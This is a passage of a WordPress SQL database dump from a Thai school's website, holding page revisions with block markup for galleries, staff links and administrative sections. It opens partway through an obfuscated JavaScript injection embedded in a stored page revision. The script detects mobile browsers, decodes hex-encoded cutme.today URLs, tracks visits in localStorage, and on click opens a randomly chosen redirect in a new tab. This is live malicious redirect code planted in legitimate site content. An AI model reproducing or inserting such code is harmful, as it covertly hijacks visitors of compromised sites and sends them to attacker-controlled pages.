|nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','ข้อมูลสิ่งก่อสร้าง','','inherit','closed','closed','','609-revision-v1','','','2024-08-07 11:48:16','2024-08-07 04:48:16','',609,'http://pakhaeng.ssk.in.th/?p=639',0,'revision','',0),
(640,1,'2024-08-07 11:49:55','2024-08-07 04:49:55','<!-- wp:kadence/rowlayout {\"uniqueID\":\"14_b8ea4f-02\",\"columns\":1,\"colLayout\":\"equal\",\"padding\":[\"0\",\"\",\"0\",\"\"],\"displayBoxShadow\":true,\"kbVersion\":2} -->\n<!-- wp:kadence/column {\"background\":\"#ffffff\",\"borderWidth\":[\"\",\"\",\"\",\"\"],\"uniqueID\":\"14_235c2e-aa\",\"kbVersion\":2} -->\n<div class=\"wp-block-kadence-column kadence-column14_235c2e-aa\"><div class=\"kt-inside-inner-col\"><!-- wp:generateblocks/container {\"uniqueId\":\"67990d4f\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e53f332c\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingBottom\":\"10px\"}} -->\n<!-- wp:generateblocks/image {\"uniqueId\":\"f2a87680\",\"mediaId\":23,\"sizeSlug\":\"full\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-f2a87680\"><img class=\"gb-image gb-image-f2a87680\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/โรงเรียนบ้านโคกสะอาด.png\" alt=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\" title=\"โรงเรียนบ้านหนองปลาเข็ง-กอไหล่\"/></figure>\n<!-- /wp:generateblocks/image -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"ff644ddb\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:kadence/advancedgallery {\"uniqueID\":\"14_f7576b-fd\",\"columns\":[4,4,4,3,2,2],\"ids\":[81,82,83,84],\"linkTo\":\"custom\",\"showCaption\":true,\"captionStyle\":\"cover-hover\",\"gutter\":[10,\"\",10],\"displayShadow\":true,\"imagesDynamic\":[{\"id\":81,\"link\":\"https://nsschool.ac.th/home/%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b9%80%e0%b8%a1%e0%b8%b4%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"customLink\":\"\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ประเมิน.jpg\",\"width\":750,\"height\":259},{\"id\":82,\"link\":\"https://nsschool.ac.th/home/%e0%b8%8a%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%97%e0%b8%b2%e0%b8%87%e0%b9%81%e0%b8%88%e0%b9%89%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=484\",\"linkTarget\":\"\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ช่องทางแจ้งเรื่องร้องเรียนทั่วไป.png\",\"width\":750,\"height\":259},{\"id\":83,\"link\":\"https://nsschool.ac.th/home/%e0%b8%a3%e0%b9%89%e0%b8%ad%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99%e0%b8%97%e0%b8%b8%e0%b8%88%e0%b8%a3%e0%b8%b4%e0%b8%95%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%9e%e0%b8%a4%e0%b8%95%e0%b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ข้อมูลพื้นฐาน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">ประวัติโรงเรียน</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":585,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/สีฟ้า-สีเขียว-น่ารัก-การ์ตูน-ยินดีต้อนรับเปิดภาคเรียนใหม่-เปิดเทอม-Canvas-Banner-2.png\" alt=\"\" class=\"wp-image-585\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" 